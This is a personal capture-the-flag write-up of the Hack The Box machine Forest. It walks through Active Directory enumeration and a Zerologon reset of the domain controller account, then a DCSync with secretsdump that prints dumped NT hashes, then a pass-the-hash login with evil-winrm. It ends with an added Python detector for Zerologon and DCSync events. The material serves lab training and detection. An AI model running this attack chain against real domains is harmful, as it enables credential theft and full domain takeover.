## Summary

**Platform:** Hack The Box
**Time to root:** 2 hours
**Difficulty Rating:** Easy

Enumeration reveals the [zerologon](https://github.com/dirkjanm/CVE-2020-1472) vulnerability, which can be used to set the DC machine account's password to an empty string. After that a DCSync attack may be performed using the recently changed DC machine account and Impacket's secretsdump script to dump all the hashes. By using the Administrator hash it's possible to gain a WinRM connection to the remote host and then do whatever one would like...

## Anonymous

### SMB

```sh
# initial enumeration
nxc smb $RHOST -u '' -p '' --shares --rid-brute --loggedin-users
# check common vulns
nxc smb $RHOST -u '' -p '' -M ms17-010 -M zerologon -M printnightmare
```

```
# todo nmap scan
| smb-os-discovery:
|   OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)
|   Computer name: FOREST
|   NetBIOS computer name: FOREST\x00
|   Domain name: htb.local
|   Forest name: htb.local
|   FQDN: FOREST.htb.local
|_  System time: 2025-02-05T08:35:37-08:00
```

- null auth: not permitted
- signing: True
- SMBv1: True
- guest auth: disabled
- domain: `htb.local`
- vulns: ??
### LDAP

- anonymous bind: permitted
- can list users

#### Dumping usernames

```sh
ldapsearch -x -H ldap://$RHOST -b "DC=htb,DC=local" "(objectClass=user)" > ldap-users.out
# piping usernames into a separate file
grep "sAMAccountName:" ldap-users.out | awk '{print $2}' > users.txt
# checking descriptions for passwords
grep "description:" ldap-users.out
```

```sh
cat users.txt
Guest
DefaultAccount
FOREST$
EXCH01$
$331000-VK4ADACQNUCA
SM_2c8eef0a09b545acb
SM_ca8c2ed5bdab4dc9b
SM_75a538d3025e4db9a
SM_681f53d4942840e18
SM_1b41c9286325456bb
SM_9b69f1b9d2cc45549
SM_7c96b981967141ebb
SM_c75ee099d0a64c91b
SM_1ffab36a2f5f479cb
HealthMailboxc3d7722
HealthMailboxfc9daad
HealthMailboxc0a90c9
HealthMailbox670628e
HealthMailbox968e74d
HealthMailbox6ded678
HealthMailbox83d6781
HealthMailboxfd87238
HealthMailboxb01ac64
HealthMailbox7108a4e
HealthMailbox0659cc1
sebastien
lucinda
andy
mark
santi
john
```

#### ASREPROAST

```sh
# errors
nxc ldap $RHOST -u users.txt -p '' --asreproast asreproast.txt
# don't seem to yield any love
GetNPUsers.py htb.local/ -dc-ip $RHOST -usersfile users.txt -format hashcat > ASREPRoastHashes.txt
```

### Password spray

```sh
# username:username
nxc smb $RHOST -u users.txt -p users.txt --continue-on-success
# no love
```

### SMB vulnerability - Zerologon

Was out of ideas and thought the Windows version was looking pretty grampy. So had a gander at finding some common vulnerabilities.

```sh
nxc smb $RHOST -u '' -p '' -M ms17-010 -M zerologon -M printnightmare
```

![[Pasted image 20250205182603.png]]

Reveals that the target is vulnerable to [zerologon](https://github.com/dirkjanm/CVE-2020-1472). An example of execution may be found [here](https://medium.com/fmisec/zerologon-easy-way-to-take-over-active-directory-exploitation-c4b38c63a915). Running the exploit sets the password of the `FOREST$`
DC account to an empty string, which can be verified by running:

```sh
# machine account with an empty password; quote the name so the shell keeps the trailing $
nxc smb $RHOST -u 'FOREST$' -p '' --shares
```

![[Pasted image 20250205184111.png]]

so far so good... Next up I'll dump the hashes from the DC using Impacket's secretsdump:

```sh
# DCSync as the DC machine account, which now has an empty password
secretsdump.py -no-pass -just-dc "htb.local/forest\$@$RHOST"
```

```txt
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
htb.local\Administrator:500:aad3b435b51404eeaad3b435b51404ee:32693b11e6aa90eb43d32c72a07ceea6:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:819af826bb148e603acb0f33d17632f8:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
htb.local\$331000-VK4ADACQNUCA:1123:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
...
```

Next up I'll attempt to leverage the `Administrator` hash in a [[Pass The Hash Attack (PTH) - TODO]] attack.

```sh
evil-winrm -i $RHOST -u Administrator -H 32693b11e6aa90eb43d32c72a07ceea6
```

yatzi...

## Lessons learned

- never tried the Zerologon attack before
- didn't initially look for OS/SMB vulns
- the official walk-through executes a different attack vector, specifically [[AS-REP Roasting]], which I somehow, even though I attempted it multiple times, failed at.
- compromised the box in about two hours, with time for coffee, breaks, girlfriend and taking a dump...
- no hints and no chatgpt
- I wanna start building Obsidian templates which can be used as checklists for the different services etc.
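The chain in this write-up (anonymous reset of the DC machine account, then DCSync under that account) leaves two Security-log traces a defender can hunt for: event 4742 where the target is a DC computer account and the subject is ANONYMOUS LOGON, and event 4662 where the Properties field carries one of the DS-Replication-Get-Changes rights GUIDs. The script below is an added example and not part of this write-up or of nxc, Impacket or evil-winrm; it runs over constructed JSON event lines whose field names follow the Security log's EventData names (SubjectUserName, TargetUserName, Properties, ObjectName), and it assumes FOREST$ is the only DC account. The caveat it handles: because secretsdump here runs as FOREST$, a rule that only flags non-DC principals requesting replication would miss this exact attack, so the example also correlates an earlier anonymous reset with later replication under the same account.

```python
"""Hunt Windows Security events for a Zerologon-style machine-account reset
(4742) and DCSync replication requests (4662). All sample events are constructed."""
import json

# Extended-rights GUIDs that grant directory replication (real AD values)
REPLICATION_GUIDS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
    "89e95b76-444d-4c62-991a-0facbeda640c": "DS-Replication-Get-Changes-In-Filtered-Set",
}

# Machine accounts of the domain controllers; assumption for this example
DC_ACCOUNTS = {"FOREST$"}


def is_anonymous_dc_reset(ev):
    """4742 where a DC's own machine-account password was changed by ANONYMOUS LOGON."""
    if ev.get("EventID") != 4742:
        return False
    target = ev.get("TargetUserName", "").upper()
    subject = ev.get("SubjectUserName", "").upper()
    return target in DC_ACCOUNTS and subject == "ANONYMOUS LOGON"


def requests_replication(ev):
    """4662 whose Properties field names any of the replication rights."""
    if ev.get("EventID") != 4662:
        return False
    props = ev.get("Properties", "").lower()
    return any(guid in props for guid in REPLICATION_GUIDS)


def detect(lines):
    """Return (rule, subject, target) for every suspicious JSON event line.

    Rules:
      zerologon_password_reset  DC account reset by an anonymous session
      dcsync_replication        replication rights requested by a non-DC principal
      dcsync_after_reset        replication by a DC account reset anonymously earlier
    """
    hits = []
    reset_dc_accounts = set()  # DC accounts already seen reset anonymously in this stream
    for line in lines:
        line = line.strip()
        if not line:
            continue
        try:
            ev = json.loads(line)
        except json.JSONDecodeError:
            continue  # skip malformed lines rather than abort the hunt
        if is_anonymous_dc_reset(ev):
            reset_dc_accounts.add(ev["TargetUserName"].upper())
            hits.append(("zerologon_password_reset", ev["SubjectUserName"], ev["TargetUserName"]))
            continue
        if not requests_replication(ev):
            continue
        subject = ev.get("SubjectUserName", "")
        obj = ev.get("ObjectName", "")
        if subject.upper() not in DC_ACCOUNTS:
            hits.append(("dcsync_replication", subject, obj))
        elif subject.upper() in reset_dc_accounts:
            hits.append(("dcsync_after_reset", subject, obj))
        # a DC account replicating with no prior anonymous reset is normal DC-to-DC traffic
    return hits


# Constructed sample events (not real log data)
SAMPLE_EVENTS = [
    # admin changes a workstation account: benign
    '{"EventID": 4742, "SubjectUserName": "andy", "TargetUserName": "WS01$"}',
    # the DC account changed by an anonymous session: Zerologon indicator
    '{"EventID": 4742, "SubjectUserName": "ANONYMOUS LOGON", "TargetUserName": "FOREST$"}',
    # replication rights requested under the just-reset DC account
    '{"EventID": 4662, "SubjectUserName": "FOREST$", "ObjectName": "DC=htb,DC=local", '
    '"Properties": "%%7688 {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"}',
    # replication rights requested by a plain user account
    '{"EventID": 4662, "SubjectUserName": "sebastien", "ObjectName": "DC=htb,DC=local", '
    '"Properties": "%%7688 {1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}"}',
    # 4662 without any replication right: benign
    '{"EventID": 4662, "SubjectUserName": "lucinda", "ObjectName": "CN=mark,CN=Users,DC=htb,DC=local", '
    '"Properties": "%%7688 {bf967a86-0de6-11d0-a285-00aa003049e2}"}',
]

if __name__ == "__main__":
    for rule, subject, target in detect(SAMPLE_EVENTS):
        print(f"{rule:26} subject={subject!r} target={target!r}")
```

Feeding real exports through `detect` only needs the JSON keys above; the same logic transfers to a SIEM query, where the 4742/4662 correlation should be keyed on the account name and bounded by a short time window.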